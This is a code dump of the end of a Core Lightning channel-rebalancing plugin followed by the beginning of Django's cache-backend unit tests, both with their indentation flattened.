result = maybe_rebalance_pairs(plugin, ch1, ch2, failed_channels)
if result["success"] or plugin.rebalance_stop:
return result
return {"success": False, "fee_spent": Millisatoshi(0)}
def feeadjuster_toggle(plugin: Plugin, new_value: bool):
commands = [c for c in plugin.rpc.help().get("help") if c["command"].split()[0] == "feeadjuster-toggle"]
if len(commands) == 1:
msg = plugin.rpc.feeadjuster_toggle(new_value)
return msg["forward_event_subscription"]["previous"]
else:
return True
def rebalanceall_thread(plugin: Plugin):
if not plugin.mutex.acquire(blocking=False):
return
try:
start_ts = time.time()
feeadjuster_state = feeadjuster_toggle(plugin, False)
channels = get_open_channels(plugin)
plugin.enough_liquidity = get_enough_liquidity_threshold(channels)
plugin.ideal_ratio = get_ideal_ratio(channels, plugin.enough_liquidity)
plugin.log(f"Automatic rebalance is running with enough liquidity threshold: {plugin.enough_liquidity}, "
f"ideal liquidity ratio: {plugin.ideal_ratio * 100:.2f}%, "
f"min rebalancable amount: {plugin.min_amount}, "
f"feeratio: {plugin.feeratio}")
failed_channels = []
success = 0
fee_spent = Millisatoshi(0)
while not plugin.rebalance_stop:
result = maybe_rebalance_once(plugin, failed_channels)
if not result["success"]:
break
success += 1
fee_spent += result["fee_spent"]
feeadjust_would_be_nice(plugin)
feeadjuster_toggle(plugin, feeadjuster_state)
elapsed_time = timedelta(seconds=time.time() - start_ts)
plugin.rebalanceall_msg = f"Automatic rebalance finished: {success} successful rebalance, {fee_spent} fee spent, it took {str(elapsed_time)[:-3]}"
plugin.log(plugin.rebalanceall_msg)
finally:
plugin.mutex.release()
@plugin.method("rebalanceall")
def rebalanceall(plugin: Plugin, min_amount: Millisatoshi = Millisatoshi("50000sat"), feeratio: float = 0.5):
"""Rebalance all unbalanced channels if possible for a very low fee.
Default minimum rebalancable amount is 50000sat. Default feeratio = 0.5, half of our node's default fee.
To be economical, it tries to fix the liquidity cheaper than it can be ruined by transaction forwards.
It may run for a long time (hours) in the background, but can be stopped with the rebalancestop method.
"""
# some early checks before we start the async thread
if plugin.mutex.locked():
return {"message": "Rebalance is already running, this may take a while. To stop it use the cli method 'rebalancestop'."}
channels = get_open_channels(plugin)
if len(channels) <= 1:
return {"message": "Error: Not enough open channels to rebalance anything"}
our = sum(ch["to_us_msat"] for ch in channels)
total = sum(ch["total_msat"] for ch in channels)
min_amount = Millisatoshi(min_amount)
if total - our < min_amount or our < min_amount:
return {"message": "Error: Not enough liquidity to rebalance anything"}
# param parsing ensure correct type
plugin.feeratio = float(feeratio)
plugin.min_amount = min_amount
# run the job
t = Thread(target=rebalanceall_thread, args=(plugin, ))
t.start()
return {"message": f"Rebalance started with min rebalancable amount: {plugin.min_amount}, feeratio: {plugin.feeratio}"}
@plugin.method("rebalancestop")
def rebalancestop(plugin: Plugin):
"""It stops the ongoing rebalanceall.
"""
if not plugin.mutex.locked():
if plugin.rebalanceall_msg is None:
return {"message": "No rebalance is running, nothing to stop."}
return {"message": f"No rebalance is running, nothing to stop. "
f"Last 'rebalanceall' gave: {plugin.rebalanceall_msg}"}
plugin.rebalance_stop = True
plugin.mutex.acquire(blocking=True)
plugin.rebalance_stop = False
plugin.mutex.release()
return {"message": plugin.rebalanceall_msg}
def health_score(liquidity):
if int(liquidity["ideal"]["our"]) == 0 or int(liquidity["ideal"]["their"]) == 0 or int(liquidity["min"]) == 0:
return 0
score_our = int(liquidity["our"]) / int(liquidity["ideal"]["our"])
score_their = int(liquidity["their"]) / int(liquidity["ideal"]["their"])
# distance from ideal liquidity (between 50 and 100)
score = min(score_our, score_their) * 50 + 50
coefficient_our = int(liquidity["our"]) / int(liquidity["min"])
coefficient_their = int(liquidity["their"]) / int(liquidity["min"])
# distance from minimal liquidity as a coefficient (between 0 and 1)
coefficient = min(coefficient_our, coefficient_their, 1)
return score * coefficient
def get_avg_forward_fees(plugin: Plugin, intervals):
now = time.time()
max_interval = max(intervals)
total = [0] * len(intervals)
fees = [0] * len(intervals)
res = [0] * len(intervals)
all_forwards = list(filter(lambda fwd: fwd.get("status") == "settled"
and fwd.get("resolved_time", 0)
+ max_interval * 60 * 60 * 24 > now,
plugin.rpc.listforwards()["forwards"]))
# build intermediate result per interval
for fwd in all_forwards:
for idx, i in enumerate(intervals):
if now > fwd["resolved_time"] + i * 60 * 60 * 24:
continue
total[idx] += fwd["out_msat"]
fees[idx] += fwd["fee_msat"]
# return average intermediate
for idx, i in enumerate(res):
if int(total[idx]) > 0:
res[idx] = fees[idx] / total[idx] * 10**6
else:
res[idx] = 0
return res
@plugin.method("rebalancereport")
def rebalancereport(plugin: Plugin):
"""Show information about rebalance
"""
res = {}
res["rebalanceall_is_running"] = plugin.mutex.locked()
res["getroute_method"] = plugin.getroute.__name__
res["maxhops_threshold"] = plugin.maxhops
res["msatfactor"] = plugin.msatfactor
res["erringnodes_threshold"] = plugin.erringnodes
channels = get_open_channels(plugin)
health_percent = 0.0
if len(channels) > 1:
enough_liquidity = get_enough_liquidity_threshold(channels)
ideal_ratio = get_ideal_ratio(channels, enough_liquidity)
res["enough_liquidity_threshold"] = enough_liquidity
res["ideal_liquidity_ratio"] = f"{ideal_ratio * 100:.2f}%"
for ch in channels:
liquidity = liquidity_info(ch, enough_liquidity, ideal_ratio)
health_percent += health_score(liquidity) * int(ch["total_msat"])
health_percent /= int(sum(ch["total_msat"] for ch in channels))
else:
res["enough_liquidity_threshold"] = Millisatoshi(0)
res["ideal_liquidity_ratio"] = "0%"
res["liquidity_health"] = f"{health_percent:.2f}%"
invoices = plugin.rpc.listinvoices()['invoices']
rebalances = [i for i in invoices if i.get('status') == 'paid' and i.get('label').startswith("Rebalance")]
total_fee = Millisatoshi(0)
total_amount = Millisatoshi(0)
res["total_successful_rebalances"] = len(rebalances)
for r in rebalances:
try:
pay = plugin.rpc.listpays(r["bolt11"])["pays"][0]
total_amount += pay["amount_msat"]
total_fee += pay["amount_sent_msat"] - pay["amount_msat"]
except Exception:
res["total_successful_rebalances"] -= 1
res["total_rebalanced_amount"] = total_amount
res["total_rebalance_fee"] = total_fee
if total_amount > Millisatoshi(0):
res["average_rebalance_fee_ppm"] = round(total_fee / total_amount * 10**6, 2)
else:
res["average_rebalance_fee_ppm"] = 0
avg_forward_fees = get_avg_forward_fees(plugin, [1, 7, 30])
res['average_forward_fee_ppm_1d'] = avg_forward_fees[0]
res['average_forward_fee_ppm_7d'] = avg_forward_fees[1]
res['average_forward_fee_ppm_30d'] = avg_forward_fees[2]
return res
@plugin.init()
def init(options, configuration, plugin):
config = plugin.rpc.listconfigs()
plugin.cltv_final = config.get("cltv-final")
plugin.fee_base = Millisatoshi(config.get("fee-base"))
plugin.fee_ppm = config.get("fee-per-satoshi")
plugin.mutex = Lock()
plugin.maxhops = int(options.get("rebalance-maxhops"))
plugin.msatfactor = float(options.get("rebalance-msatfactor"))
plugin.erringnodes = int(options.get("rebalance-erringnodes"))
plugin.getroute = getroute_switch(options.get("rebalance-getroute"))
plugin.rebalanceall_msg = None
plugin.log(f"Plugin rebalance initialized with {plugin.fee_base} base / {plugin.fee_ppm} ppm fee "
f"cltv_final:{plugin.cltv_final} "
f"maxhops:{plugin.maxhops} "
f"msatfactor:{plugin.msatfactor} "
f"erringnodes:{plugin.erringnodes} "
f"getroute:{plugin.getroute.__name__} ")
plugin.add_option(
"rebalance-getroute",
"iterative",
"Getroute method for route search can be 'basic' or 'iterative'."
"'basic': Tries all routes sequentially. "
"'iterative': Tries shorter and bigger routes first.",
"string"
)
plugin.add_option(
"rebalance-maxhops",
"5",
"Maximum number of hops for `getroute` call. Set to 0 to disable. "
"Note: Two hops are added for own nodes input and output channel. "
"Note: Routes with a 8 or more hops have less than 3% success rate.",
"string"
)
plugin.add_option(
"rebalance-msatfactor",
"4",
"Will instruct `getroute` call to use higher requested capacity first. "
"Note: This will decrease to 1 when no routes can be found.",
"string"
)
plugin.add_option(
"rebalance-erringnodes",
"5",
"Exclude nodes from routing that raised N or more errors. "
"Note: Use 0 to disable.",
"string"
)
plugin.run()
|
tests.py | # Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
import copy
import io
import os
import pickle
import re
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from unittest import mock
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import close_old_connections, connection, connections
from django.http import (
HttpRequest, HttpResponse, HttpResponseNotModified, StreamingHttpResponse,
)
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
ignore_warnings, override_settings,
)
from django.test.signals import setting_changed
from django.utils import timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control,
patch_response_headers, patch_vary_headers,
)
from django.utils.deprecation import RemovedInDjango21Warning
from django.views.decorators.cache import cache_page
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpicklable:
def __getstate__(self):
raise pickle.PickleError()
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Nonexistent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr('answer')
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr('answer')
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr_version('answer')
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr_version('answer')
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist')
def test_get_or_set(self):
self.assertEqual(cache.get_or_set('mykey', 'default'), 'default')
self.assertEqual(cache.get_or_set('mykey', None), None)
def test_get_or_set_callable(self):
def my_callable():
return 'default'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'default')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'default')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, exclude=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `exclude` is a set of cache names denoting which `_caches_setting_base` keys
# should be omitted.
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
exclude = exclude or set()
setting = {k: base.copy() for k in _caches_setting_base if k not in exclude}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
class BaseCacheTests:
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
"""Nonexistent cache keys return as None/default."""
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
with self.subTest(key=key):
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
"""
Followe memcached's convention where a timeout greater than 30 days is
treated as an absolute expiration timestamp instead of a relative
offset (#12399).
"""
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
"""
Passing in None into timeout results in a value that is cached forever
"""
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertIs(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
"""
Passing in zero into timeout results in a value that is not cached
"""
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count += 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def _perform_invalid_key_test(self, key, expected_warning):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
cache.set(key, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
self.assertEqual(str(w[0].message.args[0]), expected_warning)
finally:
cache.key_func = old_func
def test_invalid_key_characters(self):
# memcached doesn't allow whitespace or control characters in keys.
key = 'key with spaces and 清'
expected_warning = (
"Cache key contains characters that will cause errors if used "
"with memcached: %r" % key
)
self._perform_invalid_key_test(key, expected_warning)
def test_invalid_key_length(self):
# memcached limits key length to 250.
key = ('a' * 250) + '清'
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key, 250)
)
self._perform_invalid_key_test(key, expected_warning)
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
